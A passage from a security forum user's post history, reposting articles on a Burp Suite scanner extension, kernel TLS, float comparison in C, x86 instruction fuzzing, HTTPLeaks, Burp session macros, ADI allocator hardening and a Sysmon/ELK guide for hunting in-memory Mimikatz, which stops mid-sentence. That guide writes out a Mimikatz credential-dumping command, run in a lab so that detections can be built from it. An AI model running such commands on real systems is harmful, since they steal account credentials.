Jump to content

Nytro

Administrators
  • Posts

    18753
  • Joined

  • Last visited

  • Days Won

    726

Everything posted by Nytro

  1. Super POC: http://m.blog.csdn.net/caiqiiqi/article/details/77861477
  2. S-a lucrat mult pe partea de customer service & support in ultima perioada.
  3. Daca intri cu IP de Germania, probabil nu e nicio limita.
  4. HUNT Burp Suite Extension HUNT is a Burp Suite extension to: Identify common parameters vulnerable to certain vulnerability classes. Organize testing methodologies inside of Burp Suite. HUNT Scanner (hunt_scanner.py) This extension does not test these parameters but rather alerts on them so that a bug hunter can test them manually (thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes. HUNT Methodology (hunt_methodology.py) This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here testers can organize or attest to having done manual testing in that section of the application or having completed a certain methodology step. Getting Started with HUNT First ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options". Add HUNT via "Extender" -> "Extensions". HUNT Scanner will begin to run across traffic that flows through the proxy. Important to note, HUNT Scanner leverages the passive scanning API. Here are the conditions under which passive scan checks are run: First request of an active scan Proxy requests Any time "Do a passive scan" is selected from the context menu Passive scans are not run on the following: On every active scan response On Repeater responses On Intruder responses On Sequencer responses On Spider responses Instead, the standard workflow would be to set your scope, run Burp Spider from Target tab, then right-click "Passively scan selected items". HUNT Scanner Vulnerability Classes SQL Injection Local/Remote File Inclusion & Path Traversal Server Side Request Forgery & Open Redirect OS Command Injection Insecure Direct Object Reference Server Side Template Injection Logic & Debug Parameters Cross Site Scripting External Entity Injection Malicious File Upload TODO Change regex for parameter names to include user_id instead of just id Search in scanner window Highlight param in scanner window Implement script name checking, REST URL support, JSON & XML post-body params. Support normal convention of Request tab: Raw, Params, Headers, Hex sub-tabs inside scanner Add more methodology JSON files: Web Application Hacker's Handbook PCI HIPAA CREST OWASP Top Ten OWASP Application Security Verification Standard Penetration Testing Execution Standard Burp Suite Methodology Add more text for advisory in scanner window Add more descriptions and resources in methodology window Add functionality to send request/response to other Burp tabs like Repeater Authors JP Villanueva Jason Haddix Ryan Black Fatih Egbatan Vishal Shah License Licensed with the Apache 2.0 License here Sursa: https://github.com/bugcrowd/HUNT
      • 3
      • Upvote
      • Thanks
  5. 1 st Dave Watson Facebook San Francisco, USA dave jwatson - fb.com Abstract Transport Layer Security (TLS) is a widely-deployed protocol used for securing TCP connections on the Internet. TLS is also a required feature for HTTP/2, the latest web standard. In kernel implementations provide new opportunities for optimization of TLS. This paper explores a possible kernel TLS implementation, as well as the kernel features it enables, such as sendfile(), BPF programs, and hardware TLS offload. Our implementation saves up to 7% CPU copy overhead and up to 10% latency improvements when combined with the Kernel Connection Multiplexor (KCM). Download: https://netdevconf.org/1.2/papers/ktls.pdf
      • 1
      • Upvote
  6. Comparing Floating Point Numbers in C/C++ Published September 2nd, 2017by Elliot Chance Comparing floating point numbers for equality can be problematic. It’s difficult because often we are comparing small or large numbers that are not represented exactly. There is also issues with rounding errors caused by not being able to represent and exact value. Rather than doing a strict value comparison (==), we treat two values as equal if there values are very close to each other. So what does “very close" mean? Well to answer that we have to take a look at how the numbers are represented in memory. Here is an example 32bit float: And here is the layout of a double precision (64bit) float: The number of bits in the fraction can be thought of as the number of significant bits (or, accuracy) of the number. We do not want to use all of the fraction bits otherwise we would be doing a strict comparison, but we will use most. For both sized float types I will use 4 less significant bits: #define INT64 52 - 4 #define INT32 23 - 4 We will use this to calculate the epsilon (the small difference that is still considered equal). However, we have to be careful that the number of bits that we use to calculate the epsilon is based on the smallest precision value in the comparison. For example is we compare a 32bit float with a 64bit float we must use only the precision of the 32bit float. For this was can use a macro: #define approx(actual, expected) approxf(actual, expected, \ sizeof(actual) != sizeof(expected) ? INT32 : INT64) There are two more gotchas: Zero is a special case because the epsilon would also be zero causing an exact comparison. So we need to treat this as a separate case. Non-rational numbers, such as NaNs and infinities are never equal to each other in any combination. If either side is non-rational the comparison is never equal. static int approxf(double actual, double expected, int bits) { // We do not handle infinities or NaN. if (isinf(actual) || isinf(expected) || isnan(actual) || isnan(expected)) { return 0; } // If we expect zero (a common case) we have a fixed epsilon from actual. If // allowed to continue the epsilon calculated would be zero and we would be // doing an exact match which is what we want to avoid. if (expected == 0.0) { return fabs(actual) < (1 / pow(2, bits)); } // The epsilon is calculated based on significant bits of the actual value. // The amount of bits used depends on the original size of the float (in // terms of bits) subtracting a few to allow for very slight rounding // errors. double epsilon = fabs(expected / pow(2, bits)); // The numbers are considered equal if the absolute difference between them // is less than the relative epsilon. return fabs(actual - expected) <= epsilon; } You can find the full commented solution as part of the test suite in the c2go project. Thank you for reading. I'd really appreciate any and all feedback, please leave your comments below or consider subscribing. Happy coding. Sursa: https://elliot.land/post/comparing-floating-point-numbers-in-c-c
  7. Black Hat Publicat pe 31 aug. 2017 A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. Full Abstract:https://www.blackhat.com/us-17/briefi... Download PDF: https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
      • 5
      • Upvote
      • Like
  8. Nytro

    HTTPLeaks

    HTTPLeaks What is this? This project aims to enumerate all possible ways, a website can leak HTTP requests. In one single HTML file. See the file leak.html (raw text version) in the root of this repository. What is it for? You can use this to test your browser for CSP leaks, your web-mailer for HTTP leaks and everything else that is not supposed to send HTTP requests to where the sun won't shine. With "HTTP Leak", we are essentially referring to a situation, where a certain combination of HTML elements and attributes cause a request to an external resource to be fired - when it should not. Think, for example, of the body of an HTML mail where a HTTP Leak would tell someone out there that you just read that mail. Not always bad - but almost never good. Or think about web proxies. Those tools try to show you a website from a different domain to offer what they call "anonymity". Of course they have to also rewrite all HTML elements and attributes that fetch resources via HTTP (or alike) and if they forget something, the so called "anonymity" is gone. And, since no one really knows anymore what elements and attributes can request external resources, we decided to create this project to keep track on that. And now? The HTML will be extended as soon as we learn about a new leak, pull requests with additional exotic sources for HTTP leaks are very welcome! Further welcome are ideas of how else this content could be presented (JSON, HTML, XML, ...). Acknowledgements Thanks @hasegawayosuke, @masa141421356, @mramydnei, @avlidienbrunn , @orenhafif, @freddyb, @tehjh, @webtonull, @intchloe, @Boldewyn and many others for adding content and smaller fixes here and there! Sursa: https://github.com/cure53/HTTPLeaks
  9. Automating Web Apps Input fuzzing via Burp Macros Posted on September 3, 2017 by Samrat Das Hi Readers, This article is about Burp Suite Macros which helps us in automating efforts of manual input payload fuzzing. While it may be know to many testers, this article is written for those who are yet to harness the power of burp suite’s macro automation. In my penetration testing career so far, while performing fuzzing of parameters and page fields in web applications, I did encounter some challenges relating to session handling. In multiple cases, the application used to terminate the session being used for testing, this either happened due to some security countermeasures ( for example: getting unsafe input, the session used to get logged out) or in other cases, the say the burp spider/ crawler used to fuzz the logout page parameters and terminate the session. In such cases, further scans, probes and requests becomes unproductive. Since you have to perform a re login and establish the session of the application. I used to do this manually and it was a bit of cumbersome. While trying to find a workaround, I was going through the Burp Suite functions and based on my curiosity, I noticed Burp’s session handling functionality. After probing around the options, I came to the idea backed by some on line research that Burp takes care of the above challenges with some rule based macros. In simple words, say if fuzzing parameters leads to termination of session, Burp can auto login the app with the credentials, and continue scanning and crawling itself. Things needed: 1 I used burp’s free version (1.7.21 free) 2 Any website which has session handling ( I am showing using the classic demo.testfire.net) Step 1: This is the website I am showing which has a login feature: Vulnerable Website Step 2: At this point, I am simply keeping the interception off in burp suite and putting the credentials here to perform a login. Login Page Step 3: Here we enter the logged in page of the website: Login field values Step 4: Now in order to test the session handling, we can send this page request to burp’s repeater tab and by removing the cookies have a look if the session is terminated due to session breaking. Request using repeater Step 5: We can see that the page session is working since we have a proper session. Let’s try to remove the cookies and test again Repeater Tab Step 6: As we can see, the session gets logged out and we need to login back again to continue testing. Session Terminated Step 7: Now comes to the rescue- Burp Macros. Navigate to : Project Options -> Sessions -> Session Handling Rules Setting up Macro Step 8: Here we can see that there is a default rule – Use cookies from Burp’s cookie jar. Burp Cookie Jar Step 9: Click add button to create a new rule. Adding rule for macro Step 10: Put a rule description which suits you and under rule actions, select “Check session is valid” Setting burp rule description Step 11: Once you click OK, the session handling editor will fire up which will show the default: Issue current request. Leave as it is and scroll down to “if session is invalid, perform the following action” Rule Configuration Rule Configuration Setting Step 12: Tick the if session invalid and click on add macro. At this point, you will get a Macro Recorder which has all the proxy history. Click and select the page which has the login credentials and performs a login. Click ok Step 13: Once you click ok, the Macro editor will fire up and you can name it with a custom name, as well as have options to simulate the macro, re-record, re-analyze. Macro Recorder Step 14: Before to running a test, configure the parameters to identify if burp has captured the test parameters correctly. Macro Recorder Parameter Check Step 15: Since here all is set, we can perform a run of test macro post click ok. Step 16: Now click on final scope and set the URL Scope to all urls / suite scope/ custom scope to guide the macro where to run. Step 17: I leave it include all URLs here. Let’s now head over to repeater again to test our macro. Scope setting for macro Step 18: Take a look, we are trying to access the main page without cookies in repeater tab: Step 19: Once we hit go, the cookies will automatically get added to the request and the page will load up! Tampering cookie value to check session Macro executed Macro executed with cookie added So that’s it. It’s a sweet and simple way to show how burp is useful for creating session based rules and macros. We can simply fuzz the input fields with our test payloads to check for vulnerabilities such as XSS, SQLi, IDOR etc. Even if the application gets timed out due to intermediate inactivity or protects session against junk inputs while automated scanning or manual testing, such macros will help you execute the recorded action and log you back inside the app! You can explore it further to use cookie jar/ burp extender and lots of other option! Happy experimenting! Sursa: http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/
      • 1
      • Upvote
  10. Thursday, December 22, 2016 Hardening Allocators with ADI Memory allocators handle a crucial role in any modern application/operating system: satisfy arbitrary-sized dynamic memory requests. Errors by the consumer in handling such buffers can lead to a variety of vulnerabilities, which have been regularly exploited by attackers in the past 15 years. In this blog entry, we'll look at how the ADI (Application Data Integrity) feature of the new Oracle M7 SPARC processors can help in hardening allocators against most of these attacks. A quick memory allocator primer Writing memory allocators is a challenging task. An allocator must be performant, limit fragmentation to a bare minimum, scale up to multi-thread applications and handle efficiently both small and large allocations and frequent/unfrequent alloc/free cycles. Looking in depth at allocator designs is beyond the scope of this blog entry, so we'll focus here on only the features that are relevant from an exploitation (and defense) perspective. Modern operating systems deal with memory in page-sized chunks (ranging from 8K up to 16G on M7). Imagine an application that needs to store a 10 characters string: handing out a 8K page is certainly doable, but is hardly an efficient way to satisfy the request. Memory allocators solve the problem by sitting between the OS physical page allocator and the consumer (being it the kernel itself or an application) and efficiently manage arbitrary sized allocations, dividing pages into smaller chunks when small buffers are needed. Allocators are composed of three main entities: live buffers: a chunk of memory that has been assigned to the application and is guaranteed to hold at least the amount of bytes requested. free buffers: chunks of memory that the allocator can use to satisfy an application request. Depending on the allocation design, these are either fixed-size buffers or buffers that can be sliced in smaller portions. metadata: all the necessary information that the allocator must maintain in order to efficiently work. Again, depending on the allocator design, this information might be stored within the buffer itself (e.g. Oracle Solaris libc malloc stores most of the data along with the buffer) or separately (e.g. Oracle Solaris umem/kmem SLAB allocator keeps the majority of the metadata into dedicated structures placed outside the objects) Since allocators divide a page in either fixed-size or arbitrary-size buffers, it's easy to see that, due to the natural flow of alloc/free requests, live buffers and free buffers end up living side by side in the linear memory space. The period that goes from when a buffer is handed out to an application, up until is freed is generally referred to as the buffer lifetime. During this period, the application has full control of the buffer contents. After this period, the allocator regains control and the application is expected to not interfere. Of course, bugs happen. Bugs can affect both the application working set of buffers or the allocator free set and metadata. If we exclude allocator intrinsic design errors (which, for long existing allocators, due to the amount of exercise they get, are basically zero), bugs always generate from the application mishandling of a buffer reference, so they always happen during the lifetime of a buffer and originate from a live buffer. It's no surprise that live buffer behavior is what both attackers and defenders start from. Exploitation vectors and techniques As we said, bugs originate from the application mishandling of allocated buffers: mishandling of buffer size: the classic case of buffer overflow. The application writes past the buffer boundaries into adjacent memory. Because buffers are intermixed with other live buffers, free buffers and, potentially, metadata, each one of those entities becomes a potential target and attackers will go for the most reliable one. mishandling of buffer references: a buffer is relinquished back to the allocator, but the attacker still holds a reference to it. Traditionally, these attacks are known as use after free (UAF), although, since this is an industry that loves taxonomies, it's not uncommon to see them further qualified as use after realloc (the buffer is reallocated, but the attacker is capable of unexpectedly modifying it through the stale reference) and double free (the same reference is passed twice to the free path). Sometimes an attacker is also capable of constructing a fake object and passing it to a free call, for example if the application erroneously calls free of a buffer allocated onto the stack. The degree of exploitability of these vulnerabilities (if we exclude the use after realloc case, which is application-specific) varies depending on what the allocator does during the free path and how many consistency/hardening checks are present. With the notable exception of double free and "vanilla" use after free, both the above classes are extremely hard to detect at runtime from an allocator perspective, as they originate (and potentially inflict all the necessary damage) during the object lifetime and the allocator has little to none practical control on the buffer. For this reason, the defense focus has been on the next best thing when bug classes cannot be eradicated: hamper/mitigate exploitation techniques. Over the years (and at various degrees in different allocators) this has taken the form of: entrypoint checks: add consistency check at the defined free and alloc entrypoints. As an example, an allocator could mark into the buffer associated metadata (or poison the buffer itself) that the buffer has been freed. It would then be able to check this information whenever the free path is entered and a double free could be easily detected. Many of the early days techniques to exploit heap overflows (~2000, w00w00 , PHRACK57 MaXX's and anonymous' articles) relied on modifying metadata that would then be leveraged during the free path. Over time, some allocators have added checks to detect some of those techniques. design mitigations: attackers crave for control of the heap layout: in what sequence are buffer allocated, where are they placed, how can a buffer containing sensitive data be conveniently allocated in a specific location. Allocators can introduce statistical mitigations to hamper some of the techniques to achieve this level of control. As an example, free object selection can be randomized (although it ends up being pretty ineffective against a variety of heap spraying techniques and/or if the attacker has quite some control on the allocation pattern), free patterns can be modified (Microsoft IE Memory Protector) or sensitive objects can be allocated from a different heap space (dedicated SLAB caches, Windows IE Isolated Heap, Chrome PartitionAlloc, etc). The bottom line goal of these (and other) design approaches is to either reduce the amount of predictability of the allocator or increase the amount of precise control that the attacker needs to have in order to create the successful heap layout conditions to exploit the bug. Of course, more invasive defenses also exist, but they hardly qualify for large scale application, as users tend to (rightfully) be pretty concerned about the performance of their applications/operating systems. This becomes even more evident when we compare the amount of defenses that are today enabled and deployed at kernel level versus the amount of defenses enabled at user level (and in browsers): different components have different (and varying) performance requirements. The practical result is that slab overflows are today probably the most reliable type of vulnerability at kernel level and use after free are a close second in kernel land, while extensively targeted in user land, with only the browsers being significantly more hardened than other components. Extensive work is going on towards automating and abstracting the development of exploits for such bugs (as recently presented by argp at Zeronights), which makes the design of efficient defenses even more compelling. ADI to the rescue Enter the Oracle SPARC M7 processor and ADI, Application Data Integrity, that were both unveiled at HotChips and Oracle OpenWorld 2014. At its core, ADI provides memory tagging. Whenever ADI is enabled on a page entry, dedicated non-privileged load/store instructions provide the ability to assign a 4-bit version to each 64-byte cacheline that is part of the page. This version is maintained by the hardware throughout the entire non-persistent memory hierarchy (basically, all the way down to DRAM and back). The same version can then be mirrored onto the (previously) unused 4 topmost bits of each virtual address. Once this is done, each time a pointer is used to access a memory range, if ADI is enabled (both at the page and per-thread level), the tag stored in the pointer is checked by the hardware against the tag stored in the cache line. If the two match, all is peachy. If they don't, an exception is raised. Since the check is done in hardware, the main burden is at buffer creation, rather than at each access, which means that ADI can be introduced in a memory allocator and its benefit extended to any application consuming it without the need of extra instrumentation or special instructions into the application itself. This is a significant difference from other hardware-based memory corruption detection options, like Intel MPX, and minimizes the performance impact of ADI while maximizing coverage. More importantly, this means we finally have a reliable way to detect live object mishandling: the hardware does it for us. [ADI versioning at work. Picture taken from Oracle SPARC M7 presentation] 4 bits allow for a handful of possible values. There are two intuitive ways in which an ADI-aware allocator can invariantly detect a linear overflow from a buffer/object to the adjacent one: introduce a redzone with a special tag tag differently any two adjacent buffers Introducing a redzone means wasting 64-byte per allocation, since 64-byte is the minimum granularity with ADI. Wasted memory scales up linearly with the number of allocations and might end up being a substantial amount. Also, the redzone entry must be 64-byte aligned as well, which practically translates in both buffers and the redzone to be 64-byte aligned. The advantage of this approach is that is fairly simple to implement: simply round up every allocation to 64-byte and add an extra complimentary 64-byte buffer. For this reason, it can be a good candidate for debugging scenarios or for applications that are not particularly performance sensitive and need a simple allocation strategy. For allocators that store metadata within the buffer itself, this redzone space could be used to store the metadata information. Mileage again varies depending on how big the metadata is and it's worth to point out that general purpose allocators usually strive to keep it small (e.g. Oracle Solaris libc uses 16 bytes for each allocated buffer) to reduce memory wastage. Tagging differently two adjacent objects, instead, has the advantage of reducing memory wastage. In fact, the only induced wastage is the one from forcing the alignment to a 64-byte boundary. It also requires, though, to be able to uniquely pick a correct tag value at allocation time. Object-based allocators are a particularly good fit for this design because they already take some of the penalty for wasted memory (and larger caches are usually already 64-bit aligned) and their design (fixed size caches divided in a constant number of fixed size objects) allows to uniquely identify objects based on their address. This provides the ability to alternate between two different values (or range of values, e.g. odd/even tags, smaller/bigger than a median) based on the ibject position. For other allocators, the ability to properly tag the buffer depends on whether there is enough metadata to learn about the previous and next object tag. If there is, then this can still be implemented, if there isn't, one might decide to employ a statistical defense by randomizing the tag (note that the same point applies also to object-based allocators when we look at large caches, where effectively only a single object is present per cache). A third interesting property of tagging is that it can be used to uniquely identify classes of objects, for example free objects. As we discussed previously, metadata and free objects are never the affector, but only the affectee of an attack, so one tag each suffices. The good side effect of devoting a tag each is that the allocator now has a fairly performant way to identify them and issues like double-frees can be easily detected. In the same way, it's also automatically guaranteed that a live object will never be able to overflow into metdata or free objects, even if a statistical defense (e.g. tag randomization) is employed. Use-after-realloc and arbitrary writes ADI does one thing and does it great: provides support to implement an invariant to detect linear overflows. Surely, this doesn't come without some constraints (64-byte granularity, 64-byte alignment, page-level granularity to enable it, 4-bit versioning range) and might be a more or less good fit (performance and design-wise) for an existing allocator, but this doesn't detract from its security potential. Heartbleed is just one example of a linear out-of-bound access and SLAB/heap overflow fixes have been in the commit logs of all major operating systems for years now. Invariantly detecting them is a significant win. Use-after-realloc and arbitrary writes, instead, can't be invariantly stopped by ADI, although ADI can help in mitigating them. As we discussed, use-after-realloc rely on the ability, by the attacker, to hold a reference to a free-and-then-realloced object and then use this reference to modify some potentially sensitive content. ADI can introduce some statistical noise in this exploitation path, by looping/randomizing through different values for the same buffer/object. Note that this doesn't affect the invariant portion of, for example, alternate tagging in object-based allocators; it simply takes further advantage of the versioning space. Of course, if the attacker is in the position of performing a bruteforce attack, this mitigation would not hold much ground, but in certain scenarios, bruteforcing might be a limiting factor (kernel level exploitation) or leave some detectable noise. Arbitrary writes, instead, depend on the ability of the attacker to forge an address and are not strictly related to allocator ranges only. Since the focus here is the allocator, the most interesting variant is when the attacker has the ability to write to an arbitrary offset from the current buffer. If metadata and free objects are specially tagged, they are unreachable, but other live objects with the same tag might be reached. Just as in the use-afte-realloc case, adding some randomization to the sequence of tags can help, with the very same limitations. In both cases, infoleaks would precisely guide the attacker, but this is basically a given for pretty much any statistical defense. TL;DR Oracle SPARC M7 processors come with ADI, Application Data Integrity, a feature that provides memory tagging. Memory allocators can take advantage of it both for debugging and security, in order to invariantly detect linear buffer overflows and statistically mitigate against use-after-free and offset-based arbitrary writes. lazytyped at 9:35 AM Sursa: https://lazytyped.blogspot.ro/2016/12/hardening-allocators-with-adi.html?m=1
      • 1
      • Upvote
  11. Saturday, March 11, 2017 Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7) This post marks the beginning of the "Chronicles of a Threat Hunter" series where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real world attack scenarios. In this first post, I will show you the beginning of some research I have been doing recently with Sysmon in order to hunt for when Mimikatz is reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk. Invoke-Mimikatz.ps1 Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Bejamin Delpy 'gentilkiwi', Twitter: @gentilkiwi This first part will cover how we could approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs that it needs to load in order to work (no matter what process it is running from and if it touches disk or not). I will compare the results when Mimikatz is run on disk and in memory to see the specific DLLs needed on both scenarios.There is an article that talks about this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here. Requirements: Sysmon installed (I have version 6 installed) Winlogbeat forwarding logs to an ELK Server I recommend to read my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab" specially parts 5 & 6 to help you set up your environment. Mimikatz binary (Version 2.1 20170305) Invoke-Mimikatz notepad++ - Great local editor for your Sysmon configs. Mimikatz Overview Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source]. Mimikatz comes in two flavors: x64 or Win32, depending on your windows version (32/64 bits). Win32 flavor cannot access 64 bits process memory (like lsass), but can open 32 bits minidump under Windows 64 bits. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. [Source] In-Memory Mimikatz What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs loaded on disk in order to do its job. Event ID 7: Image loaded The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source] Getting ready to hunt for Mimikatz Getting a Sysmon Config ready The main goal is to monitor for "Images Loaded" when Mimikatz gets executed. However, first we have to make sure that we understand what "normal" looks like. Therefore, the first think that I recommend to do is to monitor images getting loaded by the process which will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz). We will test Mimikatz on disk first. This first step of logging Images loaded by the process executing mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for you to understand the testing methodology. The process that I used for this first test was "PowerShell.exe" so I created a basic Sysmon configuration to only log images loaded by this process. It is available in github as shown below. <Sysmon schemaversion="3.30"> <!-- Capture all hashes --> <HashAlgorithms>md5</HashAlgorithms> <EventFiltering> <!-- Event ID 1 == Process Creation. --> <ProcessCreate onmatch="include"/> <!-- Event ID 2 == File Creation Time. --> <FileCreateTime onmatch="include"/> <!-- Event ID 3 == Network Connection. --> <NetworkConnect onmatch="include"/> <!-- Event ID 5 == Process Terminated. --> <ProcessTerminate onmatch="include"/> <!-- Event ID 6 == Driver Loaded.--> <DriverLoad onmatch="include"/> <!-- Event ID 7 == Image Loaded. --> <ImageLoad onmatch="include"> <Image condition="end with">powershell.exe</Image> </ImageLoad> <!-- Event ID 8 == CreateRemoteThread. --> <CreateRemoteThread onmatch="include"/> <!-- Event ID 9 == RawAccessRead. --> <RawAccessRead onmatch="include"/> <!-- Event ID 10 == ProcessAccess. --> <ProcessAccess onmatch="include"/> <!-- Event ID 11 == FileCreate. --> <FileCreate onmatch="include"/> <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. --> <RegistryEvent onmatch="include"/> <!-- Event ID 15 == FileStream Created. --> <FileCreateStreamHash onmatch="include"/> <!-- Event ID 17 == PipeEvent. --> <PipeEvent onmatch="include"/> </EventFiltering> </Sysmon> view raw PowerShell_ImagesLoaded.xml hosted with ❤ by GitHub Download and save the Sysmon config in a preferred location of your choice as shown in Figure 1 below. Figure 1. Saving custom sysmon config. Update your Sysmon rules configuration. In order to do this, make sure you run cmd.exe as administrator, and use the the configuration you just downloaded as shown in figure 3 below. Run the following commands: Sysmon.exe -c [Sysmon config xml file] Then, confirm if your new config is running by typing the following: sysmon.exe -c (You will notice that the only things being logged will be Images loaded by "PowerShell" as shown in figure 3 below.) Figure 2. Running cmd.exe as an Administrator. Figure 3. Updating your Sysmon rules configuration. You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16 which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If so, try to update your config one more time as shown in figure 3 above. Figure 4. Checking Sysmon logs with the Event Viewer console. Delete/Clean your Index If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before updating your Sysmon config. In order to be safe and make sure you don't have old Images loaded that might interfere with your results, I recommend to delete/clear your Index by running the following command as shown in figure 6 below: curl -XDELETE 'localhost:9200/[name of your index]?pretty' If you are using my Logstash configs, an index gets created as soon as it passes data to your elasticsearch. Figure 5. Old Sysmon logs displayed on your Kibana console. Figure 6. Clearing contents of your main Index. (Clearing Logs) Now, if you refresh your view (filtering only to show Sysmon logs again), you should not see anything unless you execute PowerShell. Figure 7. No Sysmon logs in ElasticSearch yet. Create a Visualization for "ImageLoaded" events I do this so that I can group events and visualize data properly instead of using the event viewer. To get started do the following: Click on "Visualize"on the left panel Select "Data Table" as your visualization type Figure 8. Creating a new visualization. Data Table type. Select the index you want to use (In this case, the only one available is Winlogbeat) Figure 9. Selecting the right index for the visualization. As shown in figure 10 below: Select the "Split Rows" bucket type Select the aggregation type "Terms" Select the data field for the visualization (event_data.ImageLoaded.keyword) By default data will be ordered "Descending". Set the number of records to show to "200" (We do this to make sure we show all the modules being loaded) Figure 10. Creating visualization. Click on "options" and set the "Per Page" value to show 20 results per page. Remember we set this visualization to show the top 200 records in figure 10 above, and now to show 20 records per page. If you end up having 10 pages full of records, then you might want to increase the number of records to show more than 200 since you might not be showing all the results. Figure 11. Setting visualization options. Give a name to your new visualization and save it. Figure 12. Saving visualization. Figure 13. Saving visualization. Creating a simple dashboard to add our visualization To get started do the following: Click on "Dashboard" on the left panel. (Figure 14) Click on "Add" on the options above your Kibana search bar. (Figure 15) Figure 14. Creating a new dashboard. Select the visualization we just created for Images loaded. This will add the visualization to your dashboard. Figure 15. Adding our new visualization. Figure 16. Visualization added to our new dashboard. Save your new dashboard: Click on "Save" between the options "Add" and "Open". Give your dashboard a name and save it. Figure 17. Saving new dashboard. Figure 18. Saving new dashboard. Testing/Logging Images loaded by PowerShell As I stated before, if we want to detect anomalies, we have to first understand what normal looks like. Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline. To get started, launch PowerShell and close it. Figure 19. Opening PowerShell. Next, refresh your dashboard by clicking on the magnifier glass icon located to the right of the Kibana Search bar. You will see that there are several images/modules that were loaded when PowerShell executed as shown in figure 20 below. Figure 20. Logging Images loaded by PowerShell. If we go to our last page, page #4, we can see that there are 12 results on a 20 per page setup. This means that we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open it and close it. Figure 21. Logging Images loaded by PowerShell. Now in order to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 times as shown in figure 22 below. Figure 22. Opening and closing PowerShell 4 times. Once you refresh your dashboard again, you will see that we have the same images being loaded and the number (Count) of images increased by 4. We now see a count of 5 for every single unique Image loaded. A total again of 72 unique images loaded 5 times. Until this point, it is clear that PowerShell only loads 72 images when it starts for basic functionalities (Default). We are now ready to test Mimikatz on disk. Figure 23. Images loaded by PowerShell after being opened and closed 4 more times. Figure 24. Images loaded by PowerShell after being opened and closed 4 more times. Detecting Mimikatz on Disk Download the latest Mimikatz Trunk Our first test will be running the Mimikatz binary available here as shown in figure 25. Figure 25. Downloading Mimikatz binaries. Download and save your Mimikatz folder in a preferred location of your choice as shown in figure 26 below. I show you this because it is important that you remember the right path of the mimikatz binary you will use for the first test. We will need the path to update our sysmon config and log the images loaded by the mimikatz binary. Figure 26. Downloading Mimikatz binaries. Edit and Update your Sysmon config Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe as shown in figure 28. Figure 27. Editing our Sysmon config. Figure 28. Editing our Sysmon config. Open cmd.exe as administrator and run the following commands as shown in figure 29 below: sysmon.exe -c [edited sysmon xml file] Then, confirm that the changes were applied by running the following command: sysmon.exe -c (You will see that our new rule now shows up below our PowerShell one) Figure 29. Updating Sysmon rule configuration. TIP: Extend the Time Range of your Dashboard Remember that by default your Dashboard is set to show the last 15 minutes of data stored in elasticsearch. I always extend my time range to 15 or 30 minutes to make sure I still show logs that were captured more than 15 minutes ago (That is sometimes how much time it takes me to do all the extra stuff to get ready or I just simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right in order to capture all your results. Figure 30. Extending the time range of your dashboard. Running Mimikatz on Disk Now that we have everything ready, lets first run PowerShell as Administrator. If you refresh your dashboard, the count of almost every single image/module will be increased by 1 as shown in figure 32 below. Figure 31. Running PowerShell as Administrator. Figure 32. PowerShell opened as Administrator. Now, it is really important to make sure we do not load extra images that could be mixed with modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat finger a command in PowerShell. Yes, it actually loads an image named diasymreader.dll as shown in figure 34 below. Therefore, if you fat finger the wrong arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results. Figure 33. Testing wrong arguments in PowerShell One important thing also to mention is that PowerShell loads netutils.dll when the console closes. Therefore, since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our High integrity PowerShell process to run mimikatz so we cant close it yet. Figure 34. Extra image loaded by PowerShell after executing wrong arguments. It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following commands and close your PowerShell console: .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit Figure 35. Running Mimikatz on disk. Next, refresh your dashboard. You will see that our count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding because those first images might not be unique enough to be used 